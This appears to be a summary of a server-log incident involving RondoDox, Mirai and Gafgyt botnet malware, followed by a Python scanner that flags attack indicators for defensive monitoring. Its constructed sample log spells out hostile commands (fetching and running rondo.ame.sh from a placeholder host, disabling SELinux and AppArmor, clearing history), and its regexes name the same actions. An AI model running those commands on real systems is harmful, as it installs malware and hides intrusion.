
Suspicious Server Log Activity Indicates Potential Botnet Infection
The user reported finding suspicious activity in their server logs, including an attempt to access a file named "login.py" and a shell command that downloads and executes a script called "rondo.ame.sh". This script disables SELinux and AppArmor, the mandatory access control mechanisms that confine processes on Linux systems. It also downloads additional files and clears the bash history to cover its tracks. Further investigation revealed that the downloaded files include executables identified as the Mirai trojan, the Gafgyt trojan, and RondoDox. These malware strains are commonly used in botnets for launching DDoS attacks.

The technical implications are significant: disabling SELinux and AppArmor removes the confinement that would otherwise limit what a compromised process can do, so follow-on malicious activity becomes easier. The presence of Mirai and Gafgyt suggests that the attacker might be attempting to enlist the compromised server into a botnet. This incident highlights the importance of monitoring server logs for suspicious activity and maintaining robust security measures. Organizations should ensure proper logging and monitoring to detect such activities early. Keeping systems updated and using intrusion detection systems can help mitigate such threats.
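The report above turns on spotting a handful of indicators in ordinary access logs: a probe for "login.py", a download-and-execute of "rondo.ame.sh", commands that switch off SELinux or AppArmor, and history clearing. The following script is an added example written for this summary, not code from the original poster or from any of the tools named; it scans constructed Combined-Log-Format lines for those indicators and groups hits by source address. The sample lines, the documentation IP addresses, the `placeholder.invalid` host and the rule names are all assumptions made for illustration.

```python
"""Added example: flag access-log lines carrying the indicators from the report.

Sample lines, IPs, the placeholder host and the rule names are constructed
for illustration and are not taken from the original report.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Constructed sample log (RFC 5737 documentation IPs, placeholder host).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /login.py HTTP/1.1" 404 153
198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /cgi-bin/x?cmd=cd+/tmp;wget+http://placeholder.invalid/rondo.ame.sh;sh+rondo.ame.sh HTTP/1.1" 200 0
198.51.100.7 - - [01/Jan/2025:10:00:03 +0000] "GET /?c=setenforce%200;systemctl%20stop%20apparmor;history%20-c HTTP/1.1" 200 0
203.0.113.9 - - [01/Jan/2025:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Combined Log Format: client IP, ident, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicator rules (names are assumptions). Each regex is applied to the
# URL-decoded request line so percent- or plus-encoded payloads are not missed.
RULES = [
    ("probe_login_py", re.compile(r"/login\.py\b")),
    ("rondo_script", re.compile(r"rondo\.ame\.sh")),
    ("download_and_execute", re.compile(r"\b(?:wget|curl)\b.*?[;|&]\s*(?:sh|bash)\b")),
    ("selinux_disabled", re.compile(r"\bsetenforce\s+0\b")),
    ("apparmor_disabled", re.compile(r"\b(?:systemctl\s+stop\s+apparmor|aa-teardown)\b")),
    ("history_cleared", re.compile(r"\bhistory\s+-c\b|\.bash_history")),
]


@dataclass(frozen=True)
class Finding:
    line_no: int
    ip: str
    rule: str
    request: str


def decode_request(req: str) -> str:
    """Decode %xx escapes and '+' so encoded payloads match the plain-text rules."""
    return unquote_plus(req)


def scan_log(text: str) -> list[Finding]:
    """Return one Finding per (line, rule) hit, in log order then rule order."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess at its fields
        req = decode_request(m.group("req"))
        for name, rx in RULES:
            if rx.search(req):
                findings.append(Finding(n, m.group("ip"), name, req))
    return findings


def sources_to_escalate(findings: list[Finding], min_rules: int = 2) -> dict[str, set[str]]:
    """Group hits by client IP and keep sources that tripped at least min_rules
    distinct rules; a lone 404 for login.py is weak evidence, a probe followed
    by download-and-execute and MAC tampering is not."""
    by_ip: dict[str, set[str]] = {}
    for f in findings:
        by_ip.setdefault(f.ip, set()).add(f.rule)
    return {ip: rules for ip, rules in by_ip.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no} {f.ip} {f.rule}: {f.request}")
    print("escalate:", sources_to_escalate(hits))
```

Run against a real log, the same two functions can be fed `open(path).read()`; the `min_rules` threshold is what keeps a single scanner hitting `/login.py` from paging anyone, while a source that also trips the download-and-execute or SELinux/AppArmor rules is surfaced for the follow-up the report describes (checking what was downloaded, and whether the enforcement state of SELinux and AppArmor on the host still matches policy).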